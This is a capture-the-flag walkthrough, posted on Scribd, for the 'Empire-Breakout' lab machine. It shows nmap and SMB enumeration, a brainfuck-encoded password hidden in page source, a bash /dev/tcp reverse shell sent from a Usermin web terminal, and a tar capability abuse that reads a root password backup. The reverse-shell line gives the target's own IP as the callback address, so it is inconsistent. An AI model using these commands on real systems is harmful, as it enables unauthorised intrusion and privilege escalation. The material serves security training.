Scribd
Upload
47 views

WalkingThrough

This exploitation guide details the process of gaining initial access to a target system by enumerating a web page and an SMB server to discover credentials. It outlines the steps taken to escalate privileges using a backup file and the tar utility to obtain root access. The guide includes specific commands and techniques used throughout the enumeration and exploitation phases.

Uploaded by

johncoltrane681
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
47 views

WalkingThrough

This exploitation guide details the process of gaining initial access to a target system by enumerating a web page and an SMB server to discover credentials. It outlines the steps taken to escalate privileges using a backup file and the tar utility to obtain root access. The guide includes specific commands and techniques used throughout the enumeration and exploitation phases.

Uploaded by

johncoltrane681
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Walkthrough

Exploitation Guide for Empire-Breakout


Summary:
In this guide, we will thoroughly enumerate a web page and an SMB server to discover a set of
credentials to gain initial access. We will escalate privileges by discovering an old_pass.bak file
and using the tar utility to access it's contents in order to obtain root access.

Enumeration:
We begin the enumeration process with an nmap scan.

1 nmap -p- -sV -sC --open 192.168.120.156


2 PORT STATE SERVICE VERSION
3 80/tcp open http Apache httpd 2.4.51 ((Debian))
4 |_http-server-header: Apache/2.4.51 (Debian)
5 |_http-title: Apache2 Debian Default Page: It works
6 139/tcp open netbios-ssn Samba smbd 4.6.2
7 445/tcp open netbios-ssn Samba smbd 4.6.2
8 10000/tcp open http MiniServ 1.981 (Webmin httpd)
9 |_http-server-header: MiniServ/1.981
10 |_http-title: 200 — Document follows
11 20000/tcp open http MiniServ 1.830 (Webmin httpd)
12 |_http-server-header: MiniServ/1.830
13 |_http-title: 200 — Document follows
14

From the output of the scan we see ports 80 , 139 , 445 , 1000 and 20000 open and running
on the target.

Using enum4linux we discover the username cyber . We will take note of this for future
reference.

Turning to port 80 , we find the following snippet in the bottom of the page's source.

1 <!--
2 don't worry no one will get here, it's safe to share with you my access. Its
encrypted :)
3
4 ++++++++++[>+>+++>+++++++>++++++++++
<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-
----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.
<<++++++.++++++.
5
6 -->

Turning to an online deobfuscator we can decode the encrypted text written in the brainfuck
language and receive the password .2uqPEfj3D<P'a-3 .

Turning our attention to port 20000 we are redirected to the following Usermin admin panel.

We can enter the credentials discovered from our prior enumeration cyber:.2uqPEfj3D<P'a-3 .

By selecting the terminal window on the bottom of the screen, we are redirected to a terminal
where we can execute arbitrary commands.

We will proceed by obtaining a reverse shell, beginning by setting up a listener on our attack
machine.

1 ┌──(kali㉿kali)-[~]
2 └─$ sudo nc -lvnp 4444
3 listening on [any] 4444 ...

Now we enter the following reverse shell payload on the web terminal.
1 bash -i >& /dev/tcp/192.168.120.156/4444 0>&1

We receive a response in our listener

1 ┌──(kali㉿kali)-[~]
2 └─$ sudo nc -nlvp 4444
3 listening on [any] 4444 ...
4 connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 33658
5 cyber@breakout:~$

Privilege Escalation
Using getcap -r / 2>/dev/null we see cap_dac_read_search enabled which will allow us to
read any files.

Turning our attention to /var/backups , we discover an .old_pass.bak file.

Combining these two features, we can use the tar utility to reveal the contents of the
.old_pass.bak file.

1 cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak


2 cyber@breakout:~$ ./tar -xvf old_pass
3 cyber@breakout:~$ cat var/backups/.old_pass.bak
4 Ts&4&YurgtRX(=~h

Now we can authenticate as root using the password: Ts&4&YurgtRX(=~h .

1 cyber@breakout:~$ su root
2 su root
3 Password:Ts&4&YurgtRX(=~h
4
5 root@breakout:/home/cyber/var/backups# id
6 id
7 uid=0(root) gid=0(root) groups=0(root)

You might also like